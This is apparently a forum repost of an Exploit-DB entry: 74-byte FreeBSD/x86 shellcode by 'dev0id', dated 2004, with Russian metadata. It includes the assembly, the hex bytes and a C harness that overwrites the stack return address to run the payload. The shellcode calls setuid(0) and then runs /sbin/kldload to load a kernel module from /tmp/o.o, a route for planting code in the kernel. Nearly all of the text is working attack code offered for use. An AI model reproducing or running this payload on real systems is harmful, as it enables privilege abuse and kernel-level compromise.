Exploit FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13275
Проверка EDB
  1. Пройдено
Автор
DEV0ID
Тип уязвимости
SHELLCODE
Платформа
FREEBSD_X86
CVE
N/A
Дата публикации
2004-09-26
C:
/* The kldload shellcode
   setuid(0)
   loads /tmp/o.o kernel module

   Size	74 bytes
   OS   FreeBSD
		/rootteam/dev0id 	(www.sysworld.net)
			[email protected]

BITS	32
jmp	short	callme
main:
	pop	esi
	xor	eax,eax
	mov	al,0x17
	push	eax
	int	0x80
	xor	eax,eax
	push	eax
	push long	0x68732f6e
	push long	0x69622f2f
	mov	ebx,esp
	push	eax
	push word	0x632d
	mov	edi,esp
	push	eax
	push	esi
	push	edi
	push	ebx
	mov	edi,esp
	push	eax
	push	edi
	push	ebx
	push	eax
	mov	al,0x3b
	int	0x80
callme:
	call	main
	db	'/sbin/kldload /tmp/o.o'
*/

char shellcode[] =
	"\xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e"
	"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63"
	"\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57\x53\x50\xb0\x3b\xcd"
	"\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64"
	"\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f";

int
main(void)
{
	int *ret;
	ret = (int*)&ret+2;
	(*ret) = shellcode;
}

// milw0rm.com [2004-09-26]
 
Источник
www.exploit-db.com

Похожие темы